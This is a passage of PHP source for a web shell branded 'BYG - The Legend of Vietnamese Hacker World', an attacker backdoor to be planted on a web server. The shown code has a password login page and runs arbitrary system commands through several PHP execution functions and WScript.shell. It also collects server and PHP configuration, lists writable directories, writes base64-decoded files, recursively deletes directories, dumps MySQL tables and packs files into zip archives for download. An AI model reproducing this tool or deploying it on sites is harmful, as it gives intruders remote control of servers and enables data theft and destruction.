1513 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1514 p('</p>');
1515 formfoot();
1516
1517 if ($command) {
1518 p('<hr width="100%" noshade /><pre>');
1519 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1520 $wsh = new COM('WScript.shell');
1521 $exec = $wsh->exec('cmd.exe /c '.$command);
1522 $stdout = $exec->StdOut();
1523 $stroutput = $stdout->ReadAll();
1524 echo $stroutput;
1525 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1526 $descriptorspec = array(
1527 0 => array('pipe', 'r'),
1528 1 => array('pipe', 'w'),
1529 2 => array('pipe', 'w')
1530 );
1531 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1532 if (is_resource($process)) {
1533 fwrite($pipes[0], $command."\r\n");
1534 fwrite($pipes[0], "exit\r\n");
1535 fclose($pipes[0]);
1536 while (!feof($pipes[1])) {
1537 echo fgets($pipes[1], 1024);
1538 }
1539 fclose($pipes[1]);
1540 while (!feof($pipes[2])) {
1541 echo fgets($pipes[2], 1024);
1542 }
1543 fclose($pipes[2]);
1544 proc_close($process);
1545 }
1546 } else {
1547 echo(execute($command));
1548 }
1549 p('</pre>');
1550 }
1551}//end shell
1552
1553elseif ($action == 'phpenv') {
1554 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1555 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1556 !$dis_func && $dis_func = 'No';
1557 $info = array(
1558 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1559 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1560 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1561 4 => array('Server OS',PHP_OS),
1562 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1563 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1564 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1565 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1566 9 => array('The file path',__FILE__),
1567
1568 10 => array('PHP Version',PHP_VERSION),
1569 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1570 12 => array('Safe Mode',getcfg('safe_mode')),
1571 13 => array('Administrator',$adminmail),
1572 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1573 15 => array('enable_dl',getcfg('enable_dl')),
1574 16 => array('display_errors',getcfg('display_errors')),
1575 17 => array('register_globals',getcfg('register_globals')),
1576 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1577 19 => array('memory_limit',getcfg('memory_limit')),
1578 20 => array('post_max_size',getcfg('post_max_size')),
1579 21 => array('upload_max_filesize',$upsize),
1580 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1581 23 => array('disable_functions',$dis_func),
1582 );
1583
1584 if($phpvarname) {
1585 m($phpvarname .' : '.getcfg($phpvarname));
1586 }
1587
1588 formhead(array('title'=>'Server environment'));
1589 makehide('action','phpenv');
1590 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1591 formfooter();
1592
1593 $hp = array(0=> 'Server', 1=> 'PHP');
1594 for($a=0;$a<2;$a++) {
1595 p('<h2>'.$hp[$a].' »</h2>');
1596 p('<ul class="info">');
1597 if ($a==0) {
1598 for($i=1;$i<=9;$i++) {
1599 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1600 }
1601 } elseif ($a == 1) {
1602 for($i=10;$i<=23;$i++) {
1603 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1604 }
1605 }
1606 p('</ul>');
1607 }
1608}//end phpenv
1609
1610else {
1611 m('Undefined Action');
1612}
1613
1614?>
1615</td></tr></table>
1616<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1617 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1618 Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
1619</div>
1620</body>
1621</html>
1622
1623<?php
1624
1625/*======================================================
1626Show info shell
1627======================================================*/
1628
1629function m($msg) {
1630 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1631 echo $msg;
1632 echo '</div>';
1633}
1634function scookie($key, $value, $life = 0, $prefix = 1) {
1635 global $admin, $timestamp, $_SERVER;
1636 $key = ($prefix ? $admin['cookiepre'] : '').$key;
1637 $life = $life ? $life : $admin['cookielife'];
1638 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1639 setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1640}
1641function multi($num, $perpage, $curpage, $tablename) {
1642 $multipage = '';
1643 if($num > $perpage) {
1644 $page = 10;
1645 $offset = 5;
1646 $pages = @ceil($num / $perpage);
1647 if($page > $pages) {
1648 $from = 1;
1649 $to = $pages;
1650 } else {
1651 $from = $curpage - $offset;
1652 $to = $curpage + $page - $offset - 1;
1653 if($from < 1) {
1654 $to = $curpage + 1 - $from;
1655 $from = 1;
1656 if(($to - $from) < $page && ($to - $from) < $pages) {
1657 $to = $page;
1658 }
1659 } elseif($to > $pages) {
1660 $from = $curpage - $pages + $to;
1661 $to = $pages;
1662 if(($to - $from) < $page && ($to - $from) < $pages) {
1663 $from = $pages - $page + 1;
1664 }
1665 }
1666 }
1667 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1668 for($i = $from; $i <= $to; $i++) {
1669 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1670 }
1671 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1672 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1673 }
1674 return $multipage;
1675}
1676// Login page
1677function loginpage() {
1678?>
1679<html>
1680<head>
1681
1682<body bgcolor=black background=1.jpg>
1683
1684 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1685<title>BYG - The Legend of Vietnamese Hacker World </title>
1686<style type="text/css">
1687A:link {text-decoration: none; color: green }
1688A:visited {text-decoration: none;color:red}
1689A:active {text-decoration: none}
1690A:hover {text-decoration: underline; color: green;}
1691input, textarea, button
1692{
1693 font-size: 11pt;
1694 color: #FFFFFF;
1695 font-family: verdana, sans-serif;
1696 background-color: #000000;
1697 border-left: 2px dashed #8B0000;
1698 border-top: 2px dashed #8B0000;
1699 border-right: 2px dashed #8B0000;
1700 border-bottom: 2px dashed #8B0000;
1701}
1702
1703</style>
1704
1705 <BR><BR>
1706<div align=center >
1707
1708<div>
1709<font color=gray>
1710<br /><br /><br /><br /><br />
1711
1712<form method="POST" action="">
1713 <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1714 <input type="hidden" name="doing" value="login">
1715 <input type="submit" value="Login">
1716 </form>
1717<BR>
1718<?php
1719echo "".$err_mess."";
1720?>
1721
1722 <B><font color=red>
1723
1724
1725
1726
1727
1728
1729</div>
1730
1731
1732 </fieldset>
1733
1734
1735
1736</head>
1737</html>
1738
1739
1740<?php
1741 exit;
1742
1743}//end loginpage()
1744
1745function execute($cfe) {
1746 $res = '';
1747 if ($cfe) {
1748 if(function_exists('exec')) {
1749 @exec($cfe,$res);
1750 $res = join("\n",$res);
1751 } elseif(function_exists('shell_exec')) {
1752 $res = @shell_exec($cfe);
1753 } elseif(function_exists('system')) {
1754 @ob_start();
1755 @system($cfe);
1756 $res = @ob_get_contents();
1757 @ob_end_clean();
1758 } elseif(function_exists('passthru')) {
1759 @ob_start();
1760 @passthru($cfe);
1761 $res = @ob_get_contents();
1762 @ob_end_clean();
1763 } elseif(@is_resource($f = @popen($cfe,"r"))) {
1764 $res = '';
1765 while(!@feof($f)) {
1766 $res .= @fread($f,1024);
1767 }
1768 @pclose($f);
1769 }
1770 }
1771 return $res;
1772}
1773function which($pr) {
1774 $path = execute("which $pr");
1775 return ($path ? $path : $pr);
1776}
1777
1778function cf($fname,$text){
1779 if($fp=@fopen($fname,'w')) {
1780 @fputs($fp,@base64_decode($text));
1781 @fclose($fp);
1782 }
1783}
1784
1785// Debug
1786function debuginfo() {
1787 global $starttime;
1788 $mtime = explode(' ', microtime());
1789 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1790 echo 'Processed in '.$totaltime.' second(s)';
1791}
1792
1793// Function connect database
1794function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1795 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1796 p('<h2>Can not connect to MySQL server</h2>');
1797 exit;
1798 }
1799 if($link && $dbname) {
1800 if (!@mysql_select_db($dbname, $link)) {
1801 p('<h2>Database selected has error</h2>');
1802 exit;
1803 }
1804 }
1805 if($link && mysql_get_server_info() > '4.1') {
1806 if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1807 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1808 }
1809 }
1810 return $link;
1811}
1812
1813// Array strip
1814function s_array(&$array) {
1815 if (is_array($array)) {
1816 foreach ($array as $k => $v) {
1817 $array[$k] = s_array($v);
1818 }
1819 } else if (is_string($array)) {
1820 $array = stripslashes($array);
1821 }
1822 return $array;
1823}
1824
1825// HTML Strip
1826function html_clean($content) {
1827 $content = htmlspecialchars($content);
1828 $content = str_replace("\n", "<br />", $content);
1829 $content = str_replace(" ", " ", $content);
1830 $content = str_replace("\t", " ", $content);
1831 return $content;
1832}
1833
1834// Chmod
1835function getChmod($filepath){
1836 return substr(base_convert(@fileperms($filepath),10,8),-4);
1837}
1838
1839function getPerms($filepath) {
1840 $mode = @fileperms($filepath);
1841 if (($mode & 0xC000) === 0xC000) {$type = 's';}
1842 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1843 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1844 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1845 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1846 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1847 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1848 else {$type = '?';}
1849
1850 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1851 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1852 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1853 $group['read'] = ($mode & 00040) ? 'r' : '-';
1854 $group['write'] = ($mode & 00020) ? 'w' : '-';
1855 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1856 $world['read'] = ($mode & 00004) ? 'r' : '-';
1857 $world['write'] = ($mode & 00002) ? 'w' : '-';
1858 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1859
1860 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1861 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1862 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1863
1864 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1865}
1866
1867function getUser($filepath) {
1868 if (function_exists('posix_getpwuid')) {
1869 $array = @posix_getpwuid(@fileowner($filepath));
1870 if ($array && is_array($array)) {
1871 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1872 }
1873 }
1874 return '';
1875}
1876
1877// Delete dir
1878function deltree($deldir) {
1879 $mydir=@dir($deldir);
1880 while($file=$mydir->read()) {
1881 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1882 @chmod($deldir.'/'.$file,0777);
1883 deltree($deldir.'/'.$file);
1884 }
1885 if (is_file($deldir.'/'.$file)) {
1886 @chmod($deldir.'/'.$file,0777);
1887 @unlink($deldir.'/'.$file);
1888 }
1889 }
1890 $mydir->close();
1891 @chmod($deldir,0777);
1892 return @rmdir($deldir) ? 1 : 0;
1893}
1894
1895// Background
1896function bg() {
1897 global $bgc;
1898 return ($bgc++%2==0) ? 'alt1' : 'alt2';
1899}
1900
1901// Get path
1902function getPath($scriptpath, $nowpath) {
1903 if ($nowpath == '.') {
1904 $nowpath = $scriptpath;
1905 }
1906 $nowpath = str_replace('\\', '/', $nowpath);
1907 $nowpath = str_replace('//', '/', $nowpath);
1908 if (substr($nowpath, -1) != '/') {
1909 $nowpath = $nowpath.'/';
1910 }
1911 return $nowpath;
1912}
1913
1914// Get up path
1915function getUpPath($nowpath) {
1916 $pathdb = explode('/', $nowpath);
1917 $num = count($pathdb);
1918 if ($num > 2) {
1919 unset($pathdb[$num-1],$pathdb[$num-2]);
1920 }
1921 $uppath = implode('/', $pathdb).'/';
1922 $uppath = str_replace('//', '/', $uppath);
1923 return $uppath;
1924}
1925
1926// Config
1927function getcfg($varname) {
1928 $result = get_cfg_var($varname);
1929 if ($result == 0) {
1930 return 'No';
1931 } elseif ($result == 1) {
1932 return 'Yes';
1933 } else {
1934 return $result;
1935 }
1936}
1937
1938// Function name
1939function getfun($funName) {
1940 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1941}
1942
1943function GetList($dir){
1944 global $dirdata,$j,$nowpath;
1945 !$j && $j=1;
1946 if ($dh = opendir($dir)) {
1947 while ($file = readdir($dh)) {
1948 $f=str_replace('//','/',$dir.'/'.$file);
1949 if($file!='.' && $file!='..' && is_dir($f)){
1950 if (is_writable($f)) {
1951 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1952 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1953 $dirdata[$j]['dirchmod']=getChmod($f);
1954 $dirdata[$j]['dirperm']=getPerms($f);
1955 $dirdata[$j]['dirlink']=ue($dir);
1956 $dirdata[$j]['server_link']=$f;
1957 $dirdata[$j]['client_link']=ue($f);
1958 $j++;
1959 }
1960 GetList($f);
1961 }
1962 }
1963 closedir($dh);
1964 clearstatcache();
1965 return $dirdata;
1966 } else {
1967 return array();
1968 }
1969}
1970
1971function qy($sql) {
1972 //echo $sql.'<br>';
1973 $res = $error = '';
1974 if(!$res = @mysql_query($sql)) {
1975 return 0;
1976 } else if(is_resource($res)) {
1977 return 1;
1978 } else {
1979 return 2;
1980 }
1981 return 0;
1982}
1983
1984function q($sql) {
1985 return @mysql_query($sql);
1986}
1987
1988function fr($qy){
1989 mysql_free_result($qy);
1990}
1991
1992function sizecount($size) {
1993 if($size > 1073741824) {
1994 $size = round($size / 1073741824 * 100) / 100 . ' G';
1995 } elseif($size > 1048576) {
1996 $size = round($size / 1048576 * 100) / 100 . ' M';
1997 } elseif($size > 1024) {
1998 $size = round($size / 1024 * 100) / 100 . ' K';
1999 } else {
2000 $size = $size . ' B';
2001 }
2002 return $size;
2003}
2004
2005// Zip
2006class PHPZip{
2007 var $out='';
2008 function PHPZip($dir) {
2009 if (@function_exists('gzcompress')) {
2010 $curdir = getcwd();
2011 if (is_array($dir)) $filelist = $dir;
2012 else{
2013 $filelist=$this -> GetFileList($dir);//File list
2014 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
2015 }
2016 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
2017 else chdir($curdir);
2018 if (count($filelist)>0){
2019 foreach($filelist as $filename){
2020 if (is_file($filename)){
2021 $fd = fopen ($filename, 'r');
2022 $content = @fread ($fd, filesize($filename));
2023 fclose ($fd);
2024 if (is_array($dir)) $filename = basename($filename);
2025 $this -> addFile($content, $filename);
2026 }
2027 }
2028 $this->out = $this -> file();
2029 chdir($curdir);
2030 }
2031 return 1;
2032 }
2033 else return 0;
2034 }
2035
2036 // Show file list
2037 function GetFileList($dir){
2038 static $a;
2039 if (is_dir($dir)) {
2040 if ($dh = opendir($dir)) {
2041 while ($file = readdir($dh)) {
2042 if($file!='.' && $file!='..'){
2043 $f=$dir .'/'. $file;
2044 if(is_dir($f)) $this->GetFileList($f);
2045 $a[]=$f;
2046 }
2047 }
2048 closedir($dh);
2049 }
2050 }
2051 return $a;
2052 }
2053
2054 var $datasec = array();
2055 var $ctrl_dir = array();
2056 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2057 var $old_offset = 0;
2058
2059 function unix2DosTime($unixtime = 0) {
2060 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
2061 if ($timearray['year'] < 1980) {
2062 $timearray['year'] = 1980;
2063 $timearray['mon'] = 1;
2064 $timearray['mday'] = 1;
2065 $timearray['hours'] = 0;
2066 $timearray['minutes'] = 0;
2067 $timearray['seconds'] = 0;
2068 } // end if
2069 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
2070 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
2071 }
2072
2073 function addFile($data, $name, $time = 0) {
2074 $name = str_replace('\\', '/', $name);
2075
2076 $dtime = dechex($this->unix2DosTime($time));
2077 $hexdtime = '\x' . $dtime[6] . $dtime[7]
2078 . '\x' . $dtime[4] . $dtime[5]
2079 . '\x' . $dtime[2] . $dtime[3]
2080 . '\x' . $dtime[0] . $dtime[1];
2081 eval('$hexdtime = "' . $hexdtime . '";');
2082 $fr = "\x50\x4b\x03\x04";
2083 $fr .= "\x14\x00";
2084 $fr .= "\x00\x00";
2085 $fr .= "\x08\x00";
2086 $fr .= $hexdtime;
2087
2088 $unc_len = strlen($data);
2089 $crc = crc32($data);
2090 $zdata = gzcompress($data);
2091 $c_len = strlen($zdata);
2092 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2093 $fr .= pack('V', $crc);
2094 $fr .= pack('V', $c_len);
2095 $fr .= pack('V', $unc_len);
2096 $fr .= pack('v', strlen($name));
2097 $fr .= pack('v', 0);
2098 $fr .= $name;
2099 $fr .= $zdata;
2100 $fr .= pack('V', $crc);
2101 $fr .= pack('V', $c_len);
2102 $fr .= pack('V', $unc_len);
2103
2104 $this -> datasec[] = $fr;
2105 $new_offset = strlen(implode('', $this->datasec));
2106
2107 $cdrec = "\x50\x4b\x01\x02";
2108 $cdrec .= "\x00\x00";
2109 $cdrec .= "\x14\x00";
2110 $cdrec .= "\x00\x00";
2111 $cdrec .= "\x08\x00";
2112 $cdrec .= $hexdtime;
2113 $cdrec .= pack('V', $crc);
2114 $cdrec .= pack('V', $c_len);
2115 $cdrec .= pack('V', $unc_len);
2116 $cdrec .= pack('v', strlen($name) );
2117 $cdrec .= pack('v', 0 );
2118 $cdrec .= pack('v', 0 );
2119 $cdrec .= pack('v', 0 );
2120 $cdrec .= pack('v', 0 );
2121 $cdrec .= pack('V', 32 );
2122 $cdrec .= pack('V', $this -> old_offset );
2123 $this -> old_offset = $new_offset;
2124 $cdrec .= $name;
2125
2126 $this -> ctrl_dir[] = $cdrec;
2127 }
2128
2129 function file() {
2130 $data = implode('', $this -> datasec);
2131 $ctrldir = implode('', $this -> ctrl_dir);
2132 return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2133 }
2134}
2135
2136// Dump mysql
2137function sqldumptable($table, $fp=0) {
2138 $tabledump = "DROP TABLE IF EXISTS $table;\n";
2139 $tabledump .= "CREATE TABLE $table (\n";
2140
2141 $firstfield=1;
2142
2143 $fields = q("SHOW FIELDS FROM $table");
2144 while ($field = mysql_fetch_array($fields)) {
2145 if (!$firstfield) {
2146 $tabledump .= ",\n";
2147 } else {
2148 $firstfield=0;
2149 }
2150 $tabledump .= " $field[Field] $field[Type]";
2151 if (!empty($field["Default"])) {
2152 $tabledump .= " DEFAULT '$field[Default]'";
2153 }
2154 if ($field['Null'] != "YES") {
2155 $tabledump .= " NOT NULL";
2156 }
2157 if ($field['Extra'] != "") {
2158 $tabledump .= " $field[Extra]";
2159 }
2160 }
2161 fr($fields);
2162
2163 $keys = q("SHOW KEYS FROM $table");
2164 while ($key = mysql_fetch_array($keys)) {
2165 $kname=$key['Key_name'];
2166 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2167 $kname="UNIQUE|$kname";
2168 }
2169 if(!is_array($index[$kname])) {
2170 $index[$kname] = array();
2171 }
2172 $index[$kname][] = $key['Column_name'];
2173 }
2174 fr($keys);
2175
2176 while(list($kname, $columns) = @each($index)) {
2177 $tabledump .= ",\n";
2178 $colnames=implode($columns,",");
2179
2180 if ($kname == "PRIMARY") {
2181 $tabledump .= " PRIMARY KEY ($colnames)";
2182 } else {
2183 if (substr($kname,0,6) == "UNIQUE") {
2184 $kname=substr($kname,7);
2185 }
2186 $tabledump .= " KEY $kname ($colnames)";
2187 }
2188 }
2189
2190 $tabledump .= "\n);\n\n";
2191 if ($fp) {
2192 fwrite($fp,$tabledump);
2193 } else {
2194 echo $tabledump;
2195 }
2196
2197 $rows = q("SELECT * FROM $table");
2198 $numfields = mysql_num_fields($rows);
2199 while ($row = mysql_fetch_array($rows)) {
2200 $tabledump = "INSERT INTO $table VALUES(";
2201
2202 $fieldcounter=-1;
2203 $firstfield=1;
2204 while (++$fieldcounter<$numfields) {
2205 if (!$firstfield) {
2206 $tabledump.=", ";
2207 } else {
2208 $firstfield=0;
2209 }
2210
2211 if (!isset($row[$fieldcounter])) {
2212 $tabledump .= "NULL";
2213 } else {
2214 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
2215 }
2216 }
2217
2218 $tabledump .= ");\n";
2219
2220 if ($fp) {
2221 fwrite($fp,$tabledump);
2222 } else {
2223 echo $tabledump;
2224 }
2225 }
2226 fr($rows);
2227 if ($fp) {
2228 fwrite($fp,"\n");
2229 } else {
2230 echo "\n";
2231 }
2232}
2233
2234function ue($str){
2235 return urlencode($str);
2236}
2237
2238function p($str){
2239 echo $str."\n";
2240}
2241
2242function tbhead() {
2243 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2244}
2245function tbfoot(){
2246 p('</table>');
2247}
2248
2249function makehide($name,$value=''){
2250 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2251}
2252
2253function makeinput($arg = array()){
2254 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2255 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2256 !$arg['type'] && $arg['type'] = 'text';
2257 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2258 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2259 if ($arg['newline']) {
2260 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2261 } else {
2262 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2263 }
2264}
2265
2266function makeselect($arg = array()){
2267 if ($arg['onchange']) {
2268 $onchange = 'onchange="'.$arg['onchange'].'"';
2269 }
2270 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2271 if ($arg['newline']) p('<p>');
2272 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2273 if (is_array($arg['option'])) {
2274 foreach ($arg['option'] as $key=>$value) {
2275 if ($arg['selected']==$key) {
2276 p("<option value=\"$key\" selected>$value</option>");
2277 } else {
2278 p("<option value=\"$key\">$value</option>");
2279 }
2280 }
2281 }
2282 p("</select>");
2283 if ($arg['newline']) p('</p>');
2284}
2285function formhead($arg = array()) {
2286 !$arg['method'] && $arg['method'] = 'post';
2287 !$arg['action'] && $arg['action'] = $self;
2288 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2289 !$arg['name'] && $arg['name'] = 'form1';
2290 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2291 if ($arg['title']) {
2292 p('<h2>'.$arg['title'].' »</h2>');
2293 }
2294}
2295
2296function maketext($arg = array()){
2297 !$arg['cols'] && $arg['cols'] = 100;
2298 !$arg['rows'] && $arg['rows'] = 25;
2299 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2300 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2301}
2302
2303function formfooter($name = ''){
2304 !$name && $name = 'submit';
2305 p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
2306 p('</form>');
2307}
2308
2309function formfoot(){
2310 p('</form>');
2311}
2312
2313// Exit
2314function pr($a) {
2315 echo '<pre>';
2316 print_r($a);
2317 echo '</pre>';
2318}
2319?>